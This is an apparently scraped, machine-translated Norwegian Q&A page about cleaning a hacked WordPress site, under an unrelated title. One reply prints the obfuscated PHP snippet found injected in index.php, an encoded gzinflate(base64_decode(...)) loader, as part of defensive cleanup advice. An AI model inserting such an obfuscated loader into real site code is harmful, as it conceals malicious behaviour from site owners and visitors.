Penguinz0 Hypocrisy Personified (Cotton Tho)

Hei venner, WordPress-siden min ble injisert, og nå må jeg løse det.

her er domenet mitt,

http://webstutorial.com/

Hjelp meg hva jeg trenger å gjøre.

Dette er ikke en søppelpost eller koblingsteknikk

Sjekk din main.php filens topptekst, og bunntekst for skadelig kode og fjern den. Dette er filen som er infisert. Oppdater thumb.php fra Timthumb, og sjekk også index.php-filene dine for skadelig kode.

Etter at du har fjernet den ondsinnede koden fra main.php og du har sjekket index.php, søker du i alle filene dine etter den ondsinnede koden, når du er renset, oppdater WordPress til den nyeste versjonen, oppdater malen din og oppdater alle plugins.

  • da jeg sjekket min index.php filen fant jeg denne koden # 215d25 # Echo (gzinflate (base64_decode ( "TYxBDoMwDMC + UvU + Iu04AX8JJerataRLUjZ + PyQuu9qyRw2Smjk7Gk3e6GuQcceLeldwix3jqf6pSpj806w9AD60qHVjSViGwBVgpcogHF53SPVsFfK7kxw34xgLDVm9m0e4ZvMP"))); # / 215d25 #
  • Fjern den fra indeksfilen din, og søk deretter etter alle filene dine base64_decode men fjern bare flere funksjoner hvis de er nøyaktig de samme fordi base64-koding er normal. Denne funksjonen er imidlertid skadelig.
  • Jeg fant den koden i header.php, footer.php og i index.php-filer jeg fjernet derfra og nå søker i andre filer
  • Avast oppdager ikke lenger skadelig programvare, men krom er det, du må vente på at Google skal gjennomsøke nettstedet ditt og oppdatere indeksen med den rene versjonen. Hvis dette var nyttig, vennligst merk dette som svaret.
  • 1 @Nick, det kan også være lurt å lese svaret mitt om å sikre wordpress. Å følge trinnene som er beskrevet der, bør forhindre deg i å bli hacket i fremtiden.

fungert for deg: Charles Robertson | Ønsker du å kontakte oss?